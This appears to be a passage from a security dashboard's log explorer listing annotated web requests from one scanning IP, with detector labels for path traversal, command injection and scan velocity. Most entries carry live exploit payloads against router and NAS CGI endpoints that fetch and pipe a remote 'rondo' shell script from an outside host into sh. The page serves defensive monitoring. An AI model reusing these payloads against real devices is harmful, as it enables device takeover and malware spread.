← Back to IP report

Log Explorer

Fact drill-down for 45.153.34.156

Risk 19 LOW Scope All time All-time facts 60 In-scope 60 Filtered 60 Seen 2025-10-21 → 2025-10-21

Reset (all-time)

Active (none) Clear

Faceted filters (facts-based) exact core + snapshot + optional start/end

Annotation facets

HTTP facets

Snapshot facets

Custom time window (optional override)

Provide start/end to scope time explicitly (overrides days). Leave blank for all-time.

Tip: keep windows tight when you need speed, but the default is fact-complete.

Top annotators (facts, in-scope)

base 27 cmdi 20 sfp 4 ua 2 trav 2 proto 2 scan_velocity 2 hdrinj 1

Top labels (facts, in-scope)

observed 27 cmdi 20 sensitive_file 4 ua 2 trav 2 scan_velocity 2 proto 2 hdrinj 1

Click a pill to apply it as a filter.

Annotated access events

Showing page 1 / 2 — total 60 rows

← Prev Next →

#1 2025-10-21 11:33:31 event 17397083 POST 400 bytes 166

ann ua 8 label ua

Request Very short User-Agent string

/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

referer

Annotation facts

label

rule

ua:very_short

conf

65.00

details

Short/generic UAs are common in basic scripts and commodity automation.

More (full fields + snapshot) expand

url

/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

referer

summary

Very short User-Agent string

details

Short/generic UAs are common in basic scripts and commodity automation.

subnet

45.153.34.0/24

asn

51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

#2 2025-10-21 11:33:31 event 17397083 POST 400 bytes 166

ann trav 26 label trav

Request Path traversal / LFI indicator detected

/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

referer

Annotation facts

label

trav

rule

trav:mixed_separators

conf

90.00

details

Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.

More (full fields + snapshot) expand

url

/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

referer

summary

Path traversal / LFI indicator detected

details

subnet

45.153.34.0/24

asn

51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

#3 2025-10-21 11:33:31 event 17397083 POST 400 bytes 166

ann trav 28 label trav

Request Path traversal / LFI indicator detected

/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

referer

Annotation facts

label

trav

rule

trav:dotdot_slash

conf

92.00

details

More (full fields + snapshot) expand

url

/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

referer

summary

Path traversal / LFI indicator detected

details

subnet

45.153.34.0/24

asn

51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

#4 2025-10-21 11:33:31 event 17397081 POST 301 bytes 178

ann sfp 36 label sensitive_file

Request Command-style parameter observed

/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.ebj.sh%7Csh%26echo%20

referer

Mozilla/5.0 (bang2012@atomicmail.io)

Annotation facts

label

sensitive_file

rule

sfp:param:cmd

conf

86.00

details

A command-execution style query parameter was present (cmd/exec/command/shell). Snippet='/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=busybox%20wget%20-qO-%20'

More (full fields + snapshot) expand

url

/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.ebj.sh%7Csh%26echo%20

referer

Mozilla/5.0 (bang2012@atomicmail.io)

summary

Command-style parameter observed

details

A command-execution style query parameter was present (cmd/exec/command/shell). Snippet='/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=busybox%20wget%20-qO-%20'

subnet

45.153.34.0/24

asn

51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

#5 2025-10-21 11:33:31 event 17397083 POST 400 bytes 166

ann proto 12 label proto

Request Malformed percent-encoding in request target

/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

referer

Annotation facts

label

proto

rule

proto:bad_percent_encoding

conf

72.00

details

A '%' not followed by two hex digits was detected. Often caused by fuzzers/scanners or broken clients; sometimes used for evasions.

More (full fields + snapshot) expand

url

/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

referer

summary

Malformed percent-encoding in request target

details

A '%' not followed by two hex digits was detected. Often caused by fuzzers/scanners or broken clients; sometimes used for evasions.

subnet

45.153.34.0/24

asn

51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

#6 2025-10-21 11:33:31 event 17397082 GET 301 bytes 178

ann proto 24 label proto

Request Encoded NUL (%00) in request target

/setup.cgi?todo=funjsq_login&funjsq_access_token=12345|busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.fep.sh%7Csh%0A&test=11%00currentsetting.htm

referer

Mozilla/5.0 (bang2012@atomicmail.io)

Annotation facts

label

proto

rule

proto:encoded_nul_in_target

conf

92.00

details

Request target contains %00 (encoded NUL). Common in traversal / injection payloads and can trigger parser/DB edge cases.

More (full fields + snapshot) expand

url

/setup.cgi?todo=funjsq_login&funjsq_access_token=12345|busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.fep.sh%7Csh%0A&test=11%00currentsetting.htm

referer

Mozilla/5.0 (bang2012@atomicmail.io)

summary

Encoded NUL (%00) in request target

details

Request target contains %00 (encoded NUL). Common in traversal / injection payloads and can trigger parser/DB edge cases.

subnet

45.153.34.0/24

asn

51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

#7 2025-10-21 11:33:31 event 17397082 GET 301 bytes 178

ann hdrinj 24 label hdrinj

Request Encoded newline detected (%0d/%0a)

/setup.cgi?todo=funjsq_login&funjsq_access_token=12345|busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.fep.sh%7Csh%0A&test=11%00currentsetting.htm

referer

Mozilla/5.0 (bang2012@atomicmail.io)

Annotation facts

label

hdrinj

rule

hdrinj:encoded_newline

conf

90.00

details

Percent-encoded CR/LF sequences are a common indicator of CRLF injection / response splitting attempts.

More (full fields + snapshot) expand

url

/setup.cgi?todo=funjsq_login&funjsq_access_token=12345|busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.fep.sh%7Csh%0A&test=11%00currentsetting.htm

referer

Mozilla/5.0 (bang2012@atomicmail.io)

summary

Encoded newline detected (%0d/%0a)

details

Percent-encoded CR/LF sequences are a common indicator of CRLF injection / response splitting attempts.

subnet

45.153.34.0/24

asn

51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

#8 2025-10-21 11:33:31 event 17397083 POST 400 bytes 166

ann base label observed

Request event observed

/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

referer

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

referer

summary

event observed

details

—

subnet

45.153.34.0/24

asn

51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

#9 2025-10-21 11:33:31 event 17397082 GET 301 bytes 178

ann base label observed

Request event observed

/setup.cgi?todo=funjsq_login&funjsq_access_token=12345|busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.fep.sh%7Csh%0A&test=11%00currentsetting.htm

referer

Mozilla/5.0 (bang2012@atomicmail.io)

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/setup.cgi?todo=funjsq_login&funjsq_access_token=12345|busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.fep.sh%7Csh%0A&test=11%00currentsetting.htm

referer

Mozilla/5.0 (bang2012@atomicmail.io)

summary

event observed

details

—

subnet

45.153.34.0/24

asn

51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

#10 2025-10-21 11:33:31 event 17397081 POST 301 bytes 178

ann base label observed

Request event observed

/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.ebj.sh%7Csh%26echo%20

referer

Mozilla/5.0 (bang2012@atomicmail.io)

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.ebj.sh%7Csh%26echo%20

referer

Mozilla/5.0 (bang2012@atomicmail.io)

summary

event observed

details

—

subnet

45.153.34.0/24

asn

51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

#11 2025-10-21 11:33:31 event 17397079 GET 301 bytes 178

ann base label observed

Request event observed

/HNAP1/

referer

Mozilla/5.0 (bang2012@atomicmail.io)

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/HNAP1/

referer

Mozilla/5.0 (bang2012@atomicmail.io)

summary

event observed

details

—

subnet

45.153.34.0/24

asn

51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

#12 2025-10-21 11:33:31 event 17397078 GET 301 bytes 178

ann base label observed

Request event observed

/cgi-bin/;wget${IFS}-qO-${IFS}http://74.194.191.52/rondo.sbx.sh|sh&echo${IFS}

referer

Mozilla/5.0 (bang2012@atomicmail.io)

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/;wget${IFS}-qO-${IFS}http://74.194.191.52/rondo.sbx.sh|sh&echo${IFS}

referer

Mozilla/5.0 (bang2012@atomicmail.io)

summary

event observed

details

—

subnet

45.153.34.0/24

asn

51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

#13 2025-10-21 11:33:31 event 17397082 GET 301 bytes 178

ann cmdi 22 label cmdi

Request Command/file-injection indicator: cmdi:pipe_or_redirect

/setup.cgi?todo=funjsq_login&funjsq_access_token=12345|busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.fep.sh%7Csh%0A&test=11%00currentsetting.htm

referer

Mozilla/5.0 (bang2012@atomicmail.io)

Annotation facts

label

cmdi

rule

cmdi:pipe_or_redirect

conf

75.00

details

Pipe/redirect operators in a context that resembles command execution. Snippet='tup.cgi?todo=funjsq_login&funjsq_access_token=12345|busybox wget -qO- http://74.194.191.52/rondo.fep.sh|sh &test=11currents'

More (full fields + snapshot) expand

url

/setup.cgi?todo=funjsq_login&funjsq_access_token=12345|busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.fep.sh%7Csh%0A&test=11%00currentsetting.htm

referer

Mozilla/5.0 (bang2012@atomicmail.io)

summary

Command/file-injection indicator: cmdi:pipe_or_redirect

details

subnet

45.153.34.0/24

asn

51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

#14 2025-10-21 11:33:31 event 17397082 GET 301 bytes 178

ann cmdi 28 label cmdi

Request Command/file-injection indicator: cmdi:op_plus_cmd

/setup.cgi?todo=funjsq_login&funjsq_access_token=12345|busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.fep.sh%7Csh%0A&test=11%00currentsetting.htm

referer

Mozilla/5.0 (bang2012@atomicmail.io)

Annotation facts

label

cmdi

rule

cmdi:op_plus_cmd

conf

88.00

details

Command separator/operator combined with a recognized command token. Snippet='tup.cgi?todo=funjsq_login&funjsq_access_token=12345|busybox wget -qO- http://74.194.191.52/rondo.fep.sh|sh &test=11currents'

More (full fields + snapshot) expand

url

/setup.cgi?todo=funjsq_login&funjsq_access_token=12345|busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.fep.sh%7Csh%0A&test=11%00currentsetting.htm

referer

Mozilla/5.0 (bang2012@atomicmail.io)

summary

Command/file-injection indicator: cmdi:op_plus_cmd

details

subnet

45.153.34.0/24

asn

51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

#15 2025-10-21 11:33:31 event 17397081 POST 301 bytes 178

ann cmdi 22 label cmdi

Request Command/file-injection indicator: cmdi:pipe_or_redirect

/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.ebj.sh%7Csh%26echo%20

referer

Mozilla/5.0 (bang2012@atomicmail.io)

Annotation facts

label

cmdi

rule

cmdi:pipe_or_redirect

conf

75.00

details

Pipe/redirect operators in a context that resembles command execution. Snippet='rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=busybox wget -qO- http://74.194.191.52/rondo.ebj.sh|sh&echo -'

More (full fields + snapshot) expand

url

/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.ebj.sh%7Csh%26echo%20

referer

Mozilla/5.0 (bang2012@atomicmail.io)

summary

Command/file-injection indicator: cmdi:pipe_or_redirect

details

Pipe/redirect operators in a context that resembles command execution. Snippet='rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=busybox wget -qO- http://74.194.191.52/rondo.ebj.sh|sh&echo -'

subnet

45.153.34.0/24

asn

51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

#16 2025-10-21 11:33:31 event 17397081 POST 301 bytes 178

ann cmdi 30 label cmdi

Request Command/file-injection indicator: cmdi:param_plus_cmd

/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.ebj.sh%7Csh%26echo%20

referer

Mozilla/5.0 (bang2012@atomicmail.io)

Annotation facts

label

cmdi

rule

cmdi:param_plus_cmd

conf

90.00

details

Suspicious command parameter combined with a recognized command token. Snippet='rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=busybox wget -qO- http://74.194.191.52/rondo.ebj.sh|sh&echo -'

More (full fields + snapshot) expand

url

/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.ebj.sh%7Csh%26echo%20

referer

Mozilla/5.0 (bang2012@atomicmail.io)

summary

Command/file-injection indicator: cmdi:param_plus_cmd

details

Suspicious command parameter combined with a recognized command token. Snippet='rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=busybox wget -qO- http://74.194.191.52/rondo.ebj.sh|sh&echo -'

subnet

45.153.34.0/24

asn

51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

#17 2025-10-21 11:33:31 event 17397078 GET 301 bytes 178

ann cmdi 22 label cmdi

Request Command/file-injection indicator: cmdi:pipe_or_redirect

/cgi-bin/;wget${IFS}-qO-${IFS}http://74.194.191.52/rondo.sbx.sh|sh&echo${IFS}

referer

Mozilla/5.0 (bang2012@atomicmail.io)

Annotation facts

label

cmdi

rule

cmdi:pipe_or_redirect

conf

75.00

details

Pipe/redirect operators in a context that resembles command execution. Snippet='GET /cgi-bin/;wget${IFS}-qO-${IFS}http://74.194.191.52/rondo.sbx.sh|sh&echo${I'

More (full fields + snapshot) expand

url

/cgi-bin/;wget${IFS}-qO-${IFS}http://74.194.191.52/rondo.sbx.sh|sh&echo${IFS}

referer

Mozilla/5.0 (bang2012@atomicmail.io)

summary

Command/file-injection indicator: cmdi:pipe_or_redirect

details

Pipe/redirect operators in a context that resembles command execution. Snippet='GET /cgi-bin/;wget${IFS}-qO-${IFS}http://74.194.191.52/rondo.sbx.sh|sh&echo${I'

subnet

45.153.34.0/24

asn

51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

#18 2025-10-21 11:33:31 event 17397078 GET 301 bytes 178

ann cmdi 28 label cmdi

Request Command/file-injection indicator: cmdi:op_plus_cmd

/cgi-bin/;wget${IFS}-qO-${IFS}http://74.194.191.52/rondo.sbx.sh|sh&echo${IFS}

referer

Mozilla/5.0 (bang2012@atomicmail.io)

Annotation facts

label

cmdi

rule

cmdi:op_plus_cmd

conf

88.00

details

Command separator/operator combined with a recognized command token. Snippet='GET /cgi-bin/;wget${IFS}-qO-${IFS}http://74.194.191.52/rondo.sbx.sh|sh&echo${I'

More (full fields + snapshot) expand

url

/cgi-bin/;wget${IFS}-qO-${IFS}http://74.194.191.52/rondo.sbx.sh|sh&echo${IFS}

referer

Mozilla/5.0 (bang2012@atomicmail.io)

summary

Command/file-injection indicator: cmdi:op_plus_cmd

details

Command separator/operator combined with a recognized command token. Snippet='GET /cgi-bin/;wget${IFS}-qO-${IFS}http://74.194.191.52/rondo.sbx.sh|sh&echo${I'

subnet

45.153.34.0/24

asn

51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

#19 2025-10-21 11:33:30 event 17397075 GET 301 bytes 178

ann sfp 36 label sensitive_file

Request Command-style parameter observed

/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27%3Bwget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.djc.sh%7Csh%3B%27

referer

Mozilla/5.0 (bang2012@atomicmail.io)

Annotation facts

label

sensitive_file

rule

sfp:param:cmd

conf

86.00

details

A command-execution style query parameter was present (cmd/exec/command/shell). Snippet='/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27%3Bwget%20-qO-%20http%3A%2F%2F74.194.19'

More (full fields + snapshot) expand

url

/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27%3Bwget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.djc.sh%7Csh%3B%27

referer

Mozilla/5.0 (bang2012@atomicmail.io)

summary

Command-style parameter observed

details

A command-execution style query parameter was present (cmd/exec/command/shell). Snippet='/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27%3Bwget%20-qO-%20http%3A%2F%2F74.194.19'

subnet

45.153.34.0/24

asn

51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

#20 2025-10-21 11:33:30 event 17397071 GET 301 bytes 178

ann sfp 36 label sensitive_file

Request Command-style parameter observed

/cgi-bin/iptest.cgi?cmd=iptest.cgi&-time=1504225666237&-url=%60busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.eby.sh%7Csh%60

referer

Mozilla/5.0 (bang2012@atomicmail.io)

Annotation facts

label

sensitive_file

rule

sfp:param:cmd

conf

86.00

details

A command-execution style query parameter was present (cmd/exec/command/shell). Snippet='/cgi-bin/iptest.cgi?cmd=iptest.cgi&-time=1504225666237&-url=%60busybox%20wget%20-qO-'

More (full fields + snapshot) expand

url

/cgi-bin/iptest.cgi?cmd=iptest.cgi&-time=1504225666237&-url=%60busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.eby.sh%7Csh%60

referer

Mozilla/5.0 (bang2012@atomicmail.io)

summary

Command-style parameter observed

details

A command-execution style query parameter was present (cmd/exec/command/shell). Snippet='/cgi-bin/iptest.cgi?cmd=iptest.cgi&-time=1504225666237&-url=%60busybox%20wget%20-qO-'

subnet

45.153.34.0/24

asn

51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

#21 2025-10-21 11:33:30 event 17397071 GET 301 bytes 178

ann scan_velocity 12 label scan_velocity

Request Scan-velocity indicator: scanv:ua_signature

/cgi-bin/iptest.cgi?cmd=iptest.cgi&-time=1504225666237&-url=%60busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.eby.sh%7Csh%60

referer

Mozilla/5.0 (bang2012@atomicmail.io)

Annotation facts

label

scan_velocity

rule

scanv:ua_signature

conf

85.00

details

ua=scanner_signature; score=6; window=90s; total=18; rpm_equiv=12.0; upm_nonstatic_equiv=10.7; 404=0/18(0.00); ext_hits=0; ua_sig=1; methods=['GET', 'POST']

More (full fields + snapshot) expand

url

/cgi-bin/iptest.cgi?cmd=iptest.cgi&-time=1504225666237&-url=%60busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.eby.sh%7Csh%60

referer

Mozilla/5.0 (bang2012@atomicmail.io)

summary

Scan-velocity indicator: scanv:ua_signature

details

ua=scanner_signature; score=6; window=90s; total=18; rpm_equiv=12.0; upm_nonstatic_equiv=10.7; 404=0/18(0.00); ext_hits=0; ua_sig=1; methods=['GET', 'POST']

subnet

45.153.34.0/24

asn

51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

#22 2025-10-21 11:33:30 event 17397071 GET 301 bytes 178

ann scan_velocity label scan_velocity

Request Scan-velocity window summary

/cgi-bin/iptest.cgi?cmd=iptest.cgi&-time=1504225666237&-url=%60busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.eby.sh%7Csh%60

referer

Mozilla/5.0 (bang2012@atomicmail.io)

Annotation facts

label

scan_velocity

rule

scanv:window

conf

—

details

window=90s; total=18; rpm_equiv=12.0; upm_nonstatic_equiv=10.7; 404=0/18(0.00); ext_hits=0; ua_sig=1; methods=['GET', 'POST']

More (full fields + snapshot) expand

url

/cgi-bin/iptest.cgi?cmd=iptest.cgi&-time=1504225666237&-url=%60busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.eby.sh%7Csh%60

referer

Mozilla/5.0 (bang2012@atomicmail.io)

summary

Scan-velocity window summary

details

window=90s; total=18; rpm_equiv=12.0; upm_nonstatic_equiv=10.7; 404=0/18(0.00); ext_hits=0; ua_sig=1; methods=['GET', 'POST']

subnet

45.153.34.0/24

asn

51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

#23 2025-10-21 11:33:30 event 17397076 POST 301 bytes 178

ann base label observed

Request event observed

/goform/Mail_Test

referer

Mozilla/5.0 (bang2012@atomicmail.io)

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/goform/Mail_Test

referer

Mozilla/5.0 (bang2012@atomicmail.io)

summary

event observed

details

—

subnet

45.153.34.0/24

asn

51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

#24 2025-10-21 11:33:30 event 17397075 GET 301 bytes 178

ann base label observed

Request event observed

/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27%3Bwget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.djc.sh%7Csh%3B%27

referer

Mozilla/5.0 (bang2012@atomicmail.io)

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27%3Bwget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.djc.sh%7Csh%3B%27

referer

Mozilla/5.0 (bang2012@atomicmail.io)

summary

event observed

details

—

subnet

45.153.34.0/24

asn

51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

#25 2025-10-21 11:33:30 event 17397074 POST 301 bytes 178

ann base label observed

Request event observed

/cgi-bin/system_mgr.cgi?

referer

Mozilla/5.0 (bang2012@atomicmail.io)

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/system_mgr.cgi?

referer

Mozilla/5.0 (bang2012@atomicmail.io)

summary

event observed

details

—

subnet

45.153.34.0/24

asn

51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

#26 2025-10-21 11:33:30 event 17397073 POST 301 bytes 178

ann base label observed

Request event observed

/goform/mp

referer

Mozilla/5.0 (bang2012@atomicmail.io)

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/goform/mp

referer

Mozilla/5.0 (bang2012@atomicmail.io)

summary

event observed

details

—

subnet

45.153.34.0/24

asn

51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

#27 2025-10-21 11:33:30 event 17397071 GET 301 bytes 178

ann base label observed

Request event observed

/cgi-bin/iptest.cgi?cmd=iptest.cgi&-time=1504225666237&-url=%60busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.eby.sh%7Csh%60

referer

Mozilla/5.0 (bang2012@atomicmail.io)

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/iptest.cgi?cmd=iptest.cgi&-time=1504225666237&-url=%60busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.eby.sh%7Csh%60

referer

Mozilla/5.0 (bang2012@atomicmail.io)

summary

event observed

details

—

subnet

45.153.34.0/24

asn

51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

#28 2025-10-21 11:33:30 event 17397070 POST 301 bytes 178

ann base label observed

Request event observed

/cgi-bin/server/server.cgi?func=server02_main_submit&counter=5.22497857400916&TEST_BTN4=

referer

http://68.183.80.204/cgi-bin/server/server.cgi?func=server02_main_submit&counter=6.7496022225883&TEST_BTN4=

Mozilla/5.0 (bang2012@atomicmail.io)

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/server/server.cgi?func=server02_main_submit&counter=5.22497857400916&TEST_BTN4=

referer

http://68.183.80.204/cgi-bin/server/server.cgi?func=server02_main_submit&counter=6.7496022225883&TEST_BTN4=

Mozilla/5.0 (bang2012@atomicmail.io)

summary

event observed

details

—

subnet

45.153.34.0/24

asn

51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

#29 2025-10-21 11:33:30 event 17397069 POST 301 bytes 178

ann base label observed

Request event observed

/cgi-bin/cgi_main.cgi

referer

http://68.183.80.204/cfg_system_time.htm

Mozilla/5.0 (bang2012@atomicmail.io)

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/cgi_main.cgi

referer

http://68.183.80.204/cfg_system_time.htm

Mozilla/5.0 (bang2012@atomicmail.io)

summary

event observed

details

—

subnet

45.153.34.0/24

asn

51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

#30 2025-10-21 11:33:30 event 17397075 GET 301 bytes 178

ann cmdi 22 label cmdi

Request Command/file-injection indicator: cmdi:encoded_sep_in_param

/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27%3Bwget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.djc.sh%7Csh%3B%27

referer

Mozilla/5.0 (bang2012@atomicmail.io)

Annotation facts

label

cmdi

rule

cmdi:encoded_sep_in_param

conf

78.00

details

Encoded command separator/newline inside suspicious parameter context. Snippet='GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27%3Bwget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.djc.sh%7Csh'

More (full fields + snapshot) expand

url

/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27%3Bwget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.djc.sh%7Csh%3B%27

referer

Mozilla/5.0 (bang2012@atomicmail.io)

summary

Command/file-injection indicator: cmdi:encoded_sep_in_param

details

Encoded command separator/newline inside suspicious parameter context. Snippet='GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27%3Bwget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.djc.sh%7Csh'

subnet

45.153.34.0/24

asn

51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

#31 2025-10-21 11:33:30 event 17397075 GET 301 bytes 178

ann cmdi 28 label cmdi

Request Command/file-injection indicator: cmdi:op_plus_cmd

/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27%3Bwget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.djc.sh%7Csh%3B%27

referer

Mozilla/5.0 (bang2012@atomicmail.io)

Annotation facts

label

cmdi

rule

cmdi:op_plus_cmd

conf

88.00

details

Command separator/operator combined with a recognized command token. Snippet='GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=';wget -qO- http://74.194.191.52/rondo.djc.sh|sh;' -'

More (full fields + snapshot) expand

url

/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27%3Bwget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.djc.sh%7Csh%3B%27

referer

Mozilla/5.0 (bang2012@atomicmail.io)

summary

Command/file-injection indicator: cmdi:op_plus_cmd

details

Command separator/operator combined with a recognized command token. Snippet='GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=';wget -qO- http://74.194.191.52/rondo.djc.sh|sh;' -'

subnet

45.153.34.0/24

asn

